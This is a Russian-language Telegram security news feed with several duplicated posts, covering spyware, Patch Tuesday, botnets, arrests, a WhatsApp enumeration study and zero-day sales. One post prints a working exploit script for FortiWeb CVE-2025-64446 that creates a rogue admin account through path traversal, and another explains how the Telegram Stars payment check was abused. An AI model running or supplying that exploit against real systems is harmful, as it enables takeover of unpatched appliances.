LANDFALL — коммерческое шпионское ПО для Android, эксплуатирующее уже исправленную уязвимость нулевого дня Samsung (CVE-2025-21042) посредством отправленных через WhatsApp вредоносных изображений DNG, что позволяет взломать устройства Samsung Galaxy без единого клика.
Это не единичный случай. LANDFALL — часть более масштабной волны эксплуатации DNG. В течение нескольких месяцев злоумышленники использовали уязвимости анализа изображений в Samsung (CVE-2025-21042, CVE-2025-21043) и Apple (CVE-2025-43300 в цепочке с WhatsApp CVE-2025-55177 для доставки).
Это не единичный случай. LANDFALL — часть более масштабной волны эксплуатации DNG. В течение нескольких месяцев злоумышленники использовали уязвимости анализа изображений в Samsung (CVE-2025-21042, CVE-2025-21043) и Apple (CVE-2025-43300 в цепочке с WhatsApp CVE-2025-55177 для доставки).
DNG (Digital Negative Specification), или «цифровой негатив» — открытый формат для Raw-файлов изображений, используемый в цифровой фотографии. Разработан компанией Adobe Systems с целью создать стандартный формат для Raw-файлов изображений вместо множества различных форматов разных производителей фотокамер.
Файл может хранить в себе одно главное изображение, несколько изображений меньшего разрешения/качества для предпросмотра и метаданные. Формат поддерживает также сжатие данных без потерь (lossless JPEG). Спецификации формата DNG компания Adobe предоставляет бесплатно, поэтому любой производитель цифровой фототехники может включить поддержку данного формата.
👍1
NEXUS SENTINEL STATION
NETWORK INTELLIGENCE & THREAT ANALYSIS PLATFORM
Интегрированная операционная платформа безопасности, объединяющая диагностику сети с анализом угроз из нескольких источников. Проверка IOC в режиме реального времени и полный набор сетевых инструментов для аналитиков безопасности и сетевых инженеров.
NETWORK INTELLIGENCE & THREAT ANALYSIS PLATFORM
Интегрированная операционная платформа безопасности, объединяющая диагностику сети с анализом угроз из нескольких источников. Проверка IOC в режиме реального времени и полный набор сетевых инструментов для аналитиков безопасности и сетевых инженеров.
👍2
Forwarded from metroelf
А знаете, где еще есть рубильник и он может отключиться? Конечно же, в китайских электробусах 😂
В Норвегии и Дании выяснили, что электроавтобусы Yutong умеют делать то, чего не было в спецификации — их можно выключить удалённо прямо во время движения.
Норвежский Минтранс проверил — доступ к системам реально есть, причём с передачей данных с камер, микрофонов и GPS. То есть «умный транспорт» оказался чуть умнее, чем хотелось.
Сим-карты можно вытащить — но тогда автобус перестанет общаться с городскими системами. В Yutong клянутся, что доступ нужен только для диагностики, а данные «безопасно» лежат на AWS во Франкфурте.
Однако в Копенгагене уже бьют тревогу: 469 китайских автобусов — это готовая DDoS-бомба на колёсах.
Ждем первых взломов, а пока киберпанк уровня WatchDogs все ближе😁
В Норвегии и Дании выяснили, что электроавтобусы Yutong умеют делать то, чего не было в спецификации — их можно выключить удалённо прямо во время движения.
Норвежский Минтранс проверил — доступ к системам реально есть, причём с передачей данных с камер, микрофонов и GPS. То есть «умный транспорт» оказался чуть умнее, чем хотелось.
Сим-карты можно вытащить — но тогда автобус перестанет общаться с городскими системами. В Yutong клянутся, что доступ нужен только для диагностики, а данные «безопасно» лежат на AWS во Франкфурте.
Однако в Копенгагене уже бьют тревогу: 469 китайских автобусов — это готовая DDoS-бомба на колёсах.
Ждем первых взломов, а пока киберпанк уровня WatchDogs все ближе
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10
Forwarded from Femida
#фрод_новости #telegram #stars
Ага, снова.
Вчера на неофициальный клиент телеги появился плагин, который создавал на аккаунте 900к+ звезд визуально (буквально как через CheatEngine менять баланс в оффлайн-играх 😶🌫️)
При этом эти звёзды можно было списывать в большом количестве ботов. Да, опять обанкротили ботов. Никогда такого не было и вот опять.
В чем была проблема и как это работало?
При оплате Stars'ами происходит два вызова payment api Телеграма: сначала
Так вот официальный клиент никогда не позволяет отправить
Несмотря на то, что в самой документации к API связанной со Stars, Telegram говорит проверять каждую транзакцию на
Уже традиция🫡
Плагин для клиента Telegram позволял накручивать звёзды
Ага, снова.
Вчера на неофициальный клиент телеги появился плагин, который создавал на аккаунте 900к+ звезд визуально (буквально как через CheatEngine менять баланс в оффлайн-играх 😶🌫️)
При этом эти звёзды можно было списывать в большом количестве ботов. Да, опять обанкротили ботов. Никогда такого не было и вот опять.
В чем была проблема и как это работало?
При оплате Stars'ами происходит два вызова payment api Телеграма: сначала
pre_checkout (используется для проверки наличия товара), а затем successful_payment (при самой отправке звезд). Так вот официальный клиент никогда не позволяет отправить
pre_checkout, если у клиента недостаточно звёзд. Но на бэкенде этой проверки нет, поэтому никто не мешает заслать этот запрос :) Несмотря на то, что в самой документации к API связанной со Stars, Telegram говорит проверять каждую транзакцию на
successful_payment, много вайб- (или школо-) кодеров решило, что pre_checkout им достаточно (:))Уже традиция
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍6
Во вторник (11.11.25) компания Microsoft выпустила исправления для 63 новых уязвимостей безопасности, обнаруженных в ее программном обеспечении, включая одну, которая активно эксплуатировалась злоумышленниками.
Из 63 уязвимостей четырем присвоен критический уровень серьёзности, а 59 — важный. Двадцать девять из этих уязвимостей связаны с повышением привилегий, за ними следуют 16 уязвимостей, связанных с удалённым выполнением кода, 11 уязвимостей, связанных с раскрытием информации, три уязвимости типа «отказ в обслуживании» (DoS), две уязвимости, связанные с обходом функций безопасности, и две уязвимости, связанные с подменой пароля.
Эти исправления являются дополнением к 27 уязвимостям, которые производитель Windows устранил в своем браузере Edge на базе Chromium с момента выпуска обновления «вторник исправлений» в октябре 2025 года.
Из 63 уязвимостей четырем присвоен критический уровень серьёзности, а 59 — важный. Двадцать девять из этих уязвимостей связаны с повышением привилегий, за ними следуют 16 уязвимостей, связанных с удалённым выполнением кода, 11 уязвимостей, связанных с раскрытием информации, три уязвимости типа «отказ в обслуживании» (DoS), две уязвимости, связанные с обходом функций безопасности, и две уязвимости, связанные с подменой пароля.
Эти исправления являются дополнением к 27 уязвимостям, которые производитель Windows устранил в своем браузере Edge на базе Chromium с момента выпуска обновления «вторник исправлений» в октябре 2025 года.
👍3
На Пхукете в Таиланде по запросу ФБР арестовали гражданина России, которого власти США обвиняют в киберпреступлениях, сообщил журналистам глава киберполиции Таиланда (TCSD) Сурапон Прембут, передает портал «Новости Пхукета».
В пресс-релизе ведомства о 35-летнем задержанном говорится, что он является «хакером мирового класса», участвовавшим в кибератаках на цифровую инфраструктуру «государственных ведомств Европы и США».
Проведенная совместно с ФБР операция носила название «Операция 293». Подозреваемый прибыл на Пхукет 30 октября, а 6 ноября его задержали в отеле в округе Таланг, приводит подробности тайское издание Khaosod English.
Позже следователи изъяли цифровые активы из кошельков задержанного. По версии следствия, злоумышленник заразил компьютеры вредоносным ПО, похитил ключи аутентификации и сид-фразы, используемые для доступа к торговым счетам криптовалют. Затем он конвертировал похищенные активы в USDT и Bitcoin и переправил средства на свои кошельки.
Совокупный ущерб от действий хакера превысил 100 000 USDT, а в числе его жертв оказались также несколько граждан Таиланда, отметили в ведомстве.
//слабовато тянет на хакера мирового класса
В пресс-релизе ведомства о 35-летнем задержанном говорится, что он является «хакером мирового класса», участвовавшим в кибератаках на цифровую инфраструктуру «государственных ведомств Европы и США».
Проведенная совместно с ФБР операция носила название «Операция 293». Подозреваемый прибыл на Пхукет 30 октября, а 6 ноября его задержали в отеле в округе Таланг, приводит подробности тайское издание Khaosod English.
Позже следователи изъяли цифровые активы из кошельков задержанного. По версии следствия, злоумышленник заразил компьютеры вредоносным ПО, похитил ключи аутентификации и сид-фразы, используемые для доступа к торговым счетам криптовалют. Затем он конвертировал похищенные активы в USDT и Bitcoin и переправил средства на свои кошельки.
Совокупный ущерб от действий хакера превысил 100 000 USDT, а в числе его жертв оказались также несколько граждан Таиланда, отметили в ведомстве.
//слабовато тянет на хакера мирового класса
👍5
Forwarded from Femida
Фоторамки на Android ддосят Интернет
Опять? Снова!
Фоторамки Uhale, работающие на базе Android долгое время поставляются с очень серьезными бэкдорами.
Устройство при первом включении к Интернету качает обновление до версии 4.2.0, которая является зараженной. После чего рамка перезагружается и скачивает малварь, которая превращает устройство в часть ботнета Mezmess и Voi1d.
Либо хакеры нашли уязвимость в механизме обновлений и подменили версию прошивки на свою, либо же кое-кто в компании оставил этот бэкдор специально :)
Так или иначе, уязвимость существует уже с Мая и компания Whale TV, производящая эти фоторамки, так ничего и не исправила.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Forwarded from Proxy Bar
CVE-2025-10230 (CVSS 10) ну это успех
*
Несанкционированные NetBIOS имена регистрационных пакетов WINS передаются в оболочку
Неаутентифицированный сетевой злоумышленник выполняет RCE в качестве процесса Samba
*
Несанкционированные NetBIOS имена регистрационных пакетов WINS передаются в оболочку
без экранированияНеаутентифицированный сетевой злоумышленник выполняет RCE в качестве процесса Samba
на контроллерах домена Active Directory.👍3
Media is too big
VIEW IN TELEGRAM
На пленарке форума «Цифровые решения» прозвучал интересный заочный диалог между премьером Михаилом Мишустиным и сооснователем фонда развития кибербезопасности Сайберус Юрием Максимовым. Повод — филологический: стоит ли использовать слово «хакер»?
Премьер предложил более нейтральный термин — «аналитик по уязвимостям». И это можно понять: в массовом сознании «хакер» — это фигура в капюшоне и с закрытым лицом, символ угрозы. Для государства, которое активно вкладывает в развитие цифровых технологий и одновременно отвечает за безопасность и социальную стабильность, важно не подрывать доверие граждан к цифровой среде.
//это не аналитик, он ничего не анализирует, а зачастую тупо просто эсплуатирует чужие наработки.
Однако в профессиональном сообществе кибербезников «хакер» не имеет окраса. «Хакер» – это человек с особым мышлением, который ищет изъяны, уязвимости, несостыковки задекларированного с реальным. Для отрасли этот образ мышления — часть самоидентичности, неотъемлемая составляющая культуры белого взлома.
//в профессиональной среде уже устоялось что хакер это злоумышленник, а белый, черный или фиолетовый - не важно
Странно, если уж применять англицизмы - то почему бы не использовать слово "багхантер"?
Премьер предложил более нейтральный термин — «аналитик по уязвимостям». И это можно понять: в массовом сознании «хакер» — это фигура в капюшоне и с закрытым лицом, символ угрозы. Для государства, которое активно вкладывает в развитие цифровых технологий и одновременно отвечает за безопасность и социальную стабильность, важно не подрывать доверие граждан к цифровой среде.
//это не аналитик, он ничего не анализирует, а зачастую тупо просто эсплуатирует чужие наработки.
Однако в профессиональном сообществе кибербезников «хакер» не имеет окраса. «Хакер» – это человек с особым мышлением, который ищет изъяны, уязвимости, несостыковки задекларированного с реальным. Для отрасли этот образ мышления — часть самоидентичности, неотъемлемая составляющая культуры белого взлома.
//в профессиональной среде уже устоялось что хакер это злоумышленник, а белый, черный или фиолетовый - не важно
Странно, если уж применять англицизмы - то почему бы не использовать слово "багхантер"?
👍3
Forwarded from 1337
Формальный запрет на вход через иностранные сервисы существовал пару лет, но только сейчас к нему решили добавить реальные санкции.
Законопроект уже внесён в Госдуму.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4👎2
Forwarded from Proxy Bar
CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass
*
Ну то есть исходя из ЭТОГО
можно получить такое:
То есть просто получаем нового админа
*
Ну то есть исходя из ЭТОГО
можно получить такое:
python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()
payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})
cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY
Output from the box:
{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }
То есть просто получаем нового админа
👍3
Forwarded from AGI Security
This media is not supported in your browser
VIEW IN TELEGRAM
AI red teaming плейбук.
Комплексное покрытие
В этом руководстве описывается вся методология Red Teaming с использованием ИИ: от разведки до методов эксплуатации.
Практическое руководство
Основное внимание уделено практическим методам и реальным ситуациям. Каждый раздел содержит практические примеры, которые можно применить на практике.
Фокус на агентов
Сосредоточение на агентном уровне, где взаимодействуют базовые модели, инструменты, конфиденциальные данные и рабочие процессы, позволяет выявлять риски, возникающие на уровне приложений.
Испытано в бою
Применяется в реальных средах для выявления реальных уязвимостей и внедрения практических мер по их устранению.
Комплексное покрытие
В этом руководстве описывается вся методология Red Teaming с использованием ИИ: от разведки до методов эксплуатации.
Практическое руководство
Основное внимание уделено практическим методам и реальным ситуациям. Каждый раздел содержит практические примеры, которые можно применить на практике.
Фокус на агентов
Сосредоточение на агентном уровне, где взаимодействуют базовые модели, инструменты, конфиденциальные данные и рабочие процессы, позволяет выявлять риски, возникающие на уровне приложений.
Испытано в бою
Применяется в реальных средах для выявления реальных уязвимостей и внедрения практических мер по их устранению.
👍4
Forwarded from #memekatz
This media is not supported in your browser
VIEW IN TELEGRAM
Когда пытаешься сделать безопаснее
👍10👎1
WhatsApp для поиска контактов по номерам телефонов, вероятно, не имеет ограничения по скорости поиска и не блокируется при множестве обращений, следует из отчета исследователей из Венского университета. Таким образом, они смогли "пробить" 3,5 млрд зарегистрированных телефонных номеров, что в иной ситуации можно было бы назвать крупнейшей утечкой данных в истории.
У WhatsApp есть реестр пользователей, привязанный к их номерам телефонов - это нужно для беспрепятственного поиска контактов. Пользователи могут при установке приложения предоставить разрешение на доступ к своей локальной адресной книге и загрузить ее на серверы WhatsApp, получив в ответ доступ к данным о том, кто из контактов зарегистрирован в мессенджере. Но этим также можно злоупотреблять для проверки, подчеркивают исследователи.
Они разработали метод генерации датасетов с потенциально активными номерами телефонов для 245 стран, и искали контакты с частотой 7 тыс. номеров в секунду. Выявленные 3,5 млрд зарегистрированных в WhatsApp номеров превышают заявленные мессенджером "более 2 млрд". Случаи массовой проверки телефонов были и ранее.
"Поскольку зарегистрированный номер обычно указывает на активное устройство, эти списки являются надежной основой для спама, фишинга или обзвонов ботами. Это поднимает вопрос о том, как долго собранная информация остается актуальной и может быть использована злоумышленниками", - указывают составители материала.
"Так как мы предполагали, что запросы, всегда исходящие от одного IP-адреса и одних и тех же пяти аккаунтов, будут быстро ограничиваться и блокироваться, мы изначально сосредоточились на США, чтобы определить, сколько номеров, утекших в 2019 году, все еще активны. К нашему удивлению, ни IP-адрес, ни наши аккаунты не были заблокированы [за попытки]. Более того, мы не сталкивались с какими-либо ограничениями по скорости", - отмечается в отчете.
Согласно данным по "пробитым" аккаунтам, более 57% пользователей в мире имеют доступную всем фотографию в профиле. 9% глобально - бизнес-аккаунты. В материале также приведены данные по множеству стран. Но исследователи заверили, что их работа - это научное исследование, они не будут ни публиковать "сырые" данные, ни сохранять их после анализа.
У WhatsApp есть реестр пользователей, привязанный к их номерам телефонов - это нужно для беспрепятственного поиска контактов. Пользователи могут при установке приложения предоставить разрешение на доступ к своей локальной адресной книге и загрузить ее на серверы WhatsApp, получив в ответ доступ к данным о том, кто из контактов зарегистрирован в мессенджере. Но этим также можно злоупотреблять для проверки, подчеркивают исследователи.
Они разработали метод генерации датасетов с потенциально активными номерами телефонов для 245 стран, и искали контакты с частотой 7 тыс. номеров в секунду. Выявленные 3,5 млрд зарегистрированных в WhatsApp номеров превышают заявленные мессенджером "более 2 млрд". Случаи массовой проверки телефонов были и ранее.
"Поскольку зарегистрированный номер обычно указывает на активное устройство, эти списки являются надежной основой для спама, фишинга или обзвонов ботами. Это поднимает вопрос о том, как долго собранная информация остается актуальной и может быть использована злоумышленниками", - указывают составители материала.
"Так как мы предполагали, что запросы, всегда исходящие от одного IP-адреса и одних и тех же пяти аккаунтов, будут быстро ограничиваться и блокироваться, мы изначально сосредоточились на США, чтобы определить, сколько номеров, утекших в 2019 году, все еще активны. К нашему удивлению, ни IP-адрес, ни наши аккаунты не были заблокированы [за попытки]. Более того, мы не сталкивались с какими-либо ограничениями по скорости", - отмечается в отчете.
Согласно данным по "пробитым" аккаунтам, более 57% пользователей в мире имеют доступную всем фотографию в профиле. 9% глобально - бизнес-аккаунты. В материале также приведены данные по множеству стран. Но исследователи заверили, что их работа - это научное исследование, они не будут ни публиковать "сырые" данные, ни сохранять их после анализа.
👍5
Злоумышленник, известный как Zeroplayer, выставил на продажу на подпольных хакерских форумах уязвимость удаленного выполнения кода (RCE) нулевого дня в сочетании с возможностью выхода из песочницы, нацеленную на системы Microsoft Office и Windows.
Эксплойт стоимостью 300.000 долларов предположительно работает с большинством форматов файлов Office, включая последние версии, и затрагивает полностью исправленные установки Windows.
Эксплойт стоимостью 300.000 долларов предположительно работает с большинством форматов файлов Office, включая последние версии, и затрагивает полностью исправленные установки Windows.
1👍9